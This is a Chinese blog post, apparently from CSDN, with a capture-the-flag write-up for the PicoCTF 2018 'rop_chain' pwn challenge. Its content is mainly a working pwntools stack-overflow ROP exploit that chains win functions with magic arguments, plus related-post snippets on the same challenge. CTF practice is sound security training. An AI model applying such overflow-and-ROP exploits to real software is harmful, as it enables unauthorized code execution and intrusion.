buuctf PicoCTF_2018_rop_chain

最新推荐文章于 2024-07-25 12:18:23 发布
最新推荐文章于 2024-07-25 12:18:23 发布
阅读量3.3k 收藏
点赞数 1
分类专栏: buuctf pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FUCKING12/article/details/123060237
版权

PicoCTF_2018_rop_chain

没什么好说的就是一个rop链构造

上代码

from pwn import *
#node4.buuoj.cn:25469
#io=remote("node4.buuoj.cn",25469)
io=process("./PicoCTF_2018_rop_chain")
elf=ELF('./PicoCTF_2018_rop_chain')

context.log_level='debug'
#io.recvline("Enter your input> ")
#rop=ROP("./PicoCTF_2018_rop_chain")
#rop.raw(0x1c*'a')
#rop.call('win_function2',[3131746989])
#gdb.attach(io)
payload=0x18*'a'+p32(1)+p32(elf.symbols['win_function1'])+p32(elf.symbols['win_function2'])+p32(elf.symbols['flag'])+p32(0xBAAAAAAD)+p32(0xDEADBAAD)
print payload
#gdb.attach(io)
#pause()
io.sendlineafter("Enter your input> ",payload)
gdb.attach(io)
io.interactive()
thna0s
关注
专栏目录
BUUCTFpicoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1309
BUUCTFpicoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 5912
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
[BUUCTF]PWN——picoctf_2018_rop chain
mcmuyanga的博客
11-04 1042
picoctf_2018_rop chain 附件 步骤: 例行检查,32位,开启了NX保护 试运行一下程序,看到输入太长数据会崩溃 32位ida载入,习惯性的检索程序里的字符串,看见了flag.txt,双击跟进 看到程序将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 从main函数开始看程序 vuln()函数 gets函数输入,没有限制读入长度,存在溢出漏洞,覆盖ret为flag函数地址,之后想
PicoCTF_2018_rop_chain解题
最新发布
2301_81504456的博客
07-25 193
上面的flag函数中也是只定义了一个参数a1为另一个值,在构造payload时就要注意分开,a1分别是两个函数的局部变量,要满足各自if的条件,win1中没有定义变量,就不用传递参数。3.保证win1,win2都大于0且a1=0xDEADBAAD的情况下打印出flag,win1函数直接赋值给win1的值是1,win2中传递了参数a1,在这个函数中传给0xBAAAAAAD,则保证了win2是1。fgets(arg1[存储读取数据的位置],arg2[读取的前多少位],arg3[被读取数据的位置])
BUUCTFPWN】picoctf_2018_rop chain
m0_55368674的博客
01-19 204
ret2text
buuctf -picoctf_2018_rop chain
fuiifiuiii的博客
09-16 138
很明显,已经将flag打开并输入到了s里,而想要输出就需要让win1==1、win2==1,以及a1=0xdeadbaad。显然a1是可以由我们自行传入的参数(即a1可控)如此来看,逻辑就很清晰了,从vuln栈溢出跳转到win1,返回到vuln,跳转到win2并携带参数a1,返回到vuln,跳转到flag函数并携带参数a1(这个与上一个不同)win2这里也有一些要求,即要求win1==1、a1=0xbaaaaaad,这样可以使得win2置1.看flag函数的逻辑顺序。简单明了,win1=1。
BUUCTF pwn——picoctf_2018_rop chain
CNS-Enterprise BCC-1701-J
04-26 592
BUUCTF 做题练习
picoctf_2018_rop chain
03-16
picoctf_2018_rop chain是一道CTF比赛中的题目,需要使用ROP(Return Oriented Programming)技术来解决。ROP是一种利用程序中已有的代码段(称为gadget)来构造攻击代码的技术,通过将多个gadget串联起来,可以实现...
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
ROP技术解析与Netty应用实战》 ROP(Return-Oriented Programming,返回导向编程)是一种高级的利用技术,常用于安全领域,特别是在软件漏洞利用中。ROP允许攻击者通过跳转到现有代码片段(通常称为“gadgets”)...
BUUCTF gyctf_2020_borrowstack
BengDouLove的博客
04-22 837
第一个read的只能溢出0x10字节,也就是刚好覆盖返回地址,如果要ROP地方肯定不够 所以栈迁移到bank,在那里ROP 之前没遇到过这样的题,怎么迁过去我苦思冥想,最终还是看了wp,,用两个leave来控制rsp和rbp寄存器,太妙了 leave是个伪代码,,分解开就是 mov rsp,rbp pop rbp 如果把栈构造成这样 ‘A’ * 0x60 bank_addr leave_...
Buuctf(pwn) picoctf_2018_rop chain 栈溢出
半岛铁盒的博客
08-19 308
32位,开启了NX保护 利用思路 首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win2的值为1,之后去执行flag函数,if要满足的条件之前都设置好了,可以直接读出flag from pwn import * r = remote("node3.buuoj.cn", 26602) win_function1 = 0x080485CB win_function2 = 0x080485D8 fla.
[BUUCTF-pwn]——picoctf_2018_rop chain
Y_peak的博客
02-23 208
[BUUCTF-pwn]——picoctf_2018_rop chain 题目地址: https://buuoj.cn/challenges#picoctf_2018_rop%20chain checksec看看,开启了NX,但是没有canary IDA中查看一下 发现gets函数,可以栈溢出 发现flag,不过需要满足条件,才可以获得 接着找可能用到的函数 接着找到对应函数的地址 思路 利用栈溢出,构造rop链,首先将win1 = 1, 然后 win2 = 1,最后获得flag explo
BUUOJ PWN picoctf_2018_rop chain
weixin_50287973的博客
11-07 199
EXP1 from pwn import* from LibcSearcher import LibcSearcher #p=process("./PicoCTF_2018_rop_chain") p=remote("node3.buuoj.cn",25091) elf=ELF('./PicoCTF_2018_rop_chain') start=0x080484D0 payload=(0x18+4)*'a'+p32(elf.plt['puts'])+p32(start)+p32(elf.got['put
PicoCTF_2018_rop_chain
m0_74073577的博客
02-23 410
PicoCTF_2018_rop_chain
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值